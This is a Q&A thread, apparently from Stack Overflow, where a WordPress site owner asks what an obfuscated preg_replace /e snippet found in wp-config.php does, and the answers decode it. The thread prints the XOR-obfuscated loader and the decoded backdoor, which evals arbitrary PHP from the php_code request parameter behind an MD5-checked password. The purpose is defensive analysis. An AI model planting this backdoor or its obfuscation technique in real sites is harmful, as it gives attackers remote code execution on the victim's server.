# Decoding a weird and possibly malicious PHP code

Tags: php, security, encryption, encoding

I am seeing this following code on some of my sites:

```
preg_replace("/lWkTSJcPlD6Ty3nInmjgvJ=vcL/e", "d=0nAheu6tYPSH36hrrw25iBpfJC3ZDVZB9aibJcJhscojWKPC8G7eHk=Rn3rqMGsJgPlpsvMaM20iBOl9UgbcGbutSaZehGoCWOsD=5dLucuvqUtA2Jc9lLr4mFXIMALiP4mPxFahhJSNeANUKqSv20ndDAmPBxyQpZfcf70BFQPjQc5aH"^"\x01KQ\x02iJ\x0c\x13\x1e\x1d\x2a\x236\x3c\x1bj4V\x2d\x25wd\x3c\x07\x232\x11dP2c\x0bsb\x1fGIJ\x27\x07\x7f\x40\x2f\x3fK5\x05\x0e\x01\x16\x7d\x14c\x3eo\x08Uu3\x1aRLpgT\x7fQh\x0e\x16KFuQxT\x00\x08sy\x0f\x08eS\x07\x05\x23R\x40\x12eSlW\x5bs\x0ed\x7eoUb\x1d\x5c\x17\x3f\x10\x17\x5d\x2a\x2dq\x2b\x13w\x1b6\x7c\x3f\x18\x29\x13\x1d\x2e\x28\x16\x2e\x2e\x28\x0cwiDyX=A\x0d\x1e\x2b\x3ff9\x1dj\x0a\x194\x02\x23wc\x3a\x3fc1\x05\x20\x1d\x1b\x165\x15\x7d\x3bJ\x5d\x17U\x3a\x2f\x25xCjCHCa", "lWkTSJcPlD6Ty3nInmjgvJ=vcL");
?>
```

I tried to decode like a normal eval and through some parses and got no luck. Anyone knows how to decode and see what it does?

It is using the /e (eval) modifier on preg_replace, but doesn't seem to do anything//

Comment: If it's supposed to be "your site" and you didn't put it there, it's malicious by definition.

Comment: @Karl - could be an anonymous benefactor who decided to hack the site to replace bad code with something much better!

Comment: @EboMike do people even do that?

Comment: @DevinGund I do it all the time. :)

Comment: Well I could understand if it was someone from Stackoverflow :) ANYWAY, in response to the question: @John smith do you know how this code code be added? Are you not sanitizing your inputs?

Comment: No, I am just seeing it in there and trying to understand what it does (our WordPress blog got hacked, updated and now I saw that in the wp-config.php)

Answer (score 5, accepted):

Looking at the second part I notice it's 2 strings being xor'd together:

```
php > $x="d=0nAheu6tYPSH36hrrw25iBpfJC3ZDVZB9aibJcJhscojWKPC8G7eHk=Rn3rqMGsJgPlpsvMaM20iBOl9UgbcGbutSaZehGoCWOsD=5dLucuvqUtA2Jc9lLr4mFXIMALiP4mPxFahhJSNeANUKqSv20ndDAmPBxyQpZfcf70BFQPjQc5aH";                                              
php > $y="\x01KQ\x02iJ\x0c\x13\x1e\x1d\x2a\x236\x3c\x1bj4V\x2d\x25wd\x3c\x07\x232\x11dP2c\x0bsb\x1fGIJ\x27\x07\x7f\x40\x2f\x3fK5\x05\x0e\x01\x16\x7d\x14c\x3eo\x08Uu3\x1aRLpgT\x7fQh\x0e\x16KFuQxT\x00\x08sy\x0f\x08eS\x07\x05\x23R\x40\x12eSlW\x5bs\x0ed\x7eoUb\x1d\x5c\x17\x3f\x10\x17\x5d\x2a\x2dq\x2b\x13w\x1b6\x7c\x3f\x18\x29\x13\x1d\x2e\x28\x16\x2e\x2e\x28\x0cwiDyX=A\x0d\x1e\x2b\x3ff9\x1dj\x0a\x194\x02\x23wc\x3a\x3fc1\x05\x20\x1d\x1b\x165\x15\x7d\x3bJ\x5d\x17U\x3a\x2f\x25xCjCHCa";
php > $z=$x^$y;
php > print $z;
eval("if(isset(\\$_REQUEST['ch']) && (md5(\\$_REQUEST['ch']) == '568bf80805f0a16c104efd05f626234a') && isset(\\$_REQUEST['php_code'])) { eval(\\$_REQUEST['php_code']); exit(); }")
php >
```

It looks for the "password" in 'ch', if the passwords hash matches, then eval what's ever in the php_code param.

I'm not sure how the preg_replace comes into things though

*Edit*

It seems the preg replace is replacing something that will not match the replacement, causing what was just decoded to run.  Consider this example

```
<?php
preg_replace("/X/e","eval('print 1;');",'X');
?>
```

If you run that it just prints 1.  Look through your access logs for hits w/ those url params (ch and php_code)

Comment: `preg_replace` is just there to generate questions on SO. Erm, I mean, to obfuscate what's going on.

Comment: Quite an impressive approach to building a back door.

Answer (score 3):

Just take out the `e` in the regular expression, which makes PHP `eval` the expression after replacing and `echo` the code that results from the replacement. It installs a backdoor that lets anybody `eval` any PHP code sent through the URL.

See http://codepad.viper-7.com/VUmML8.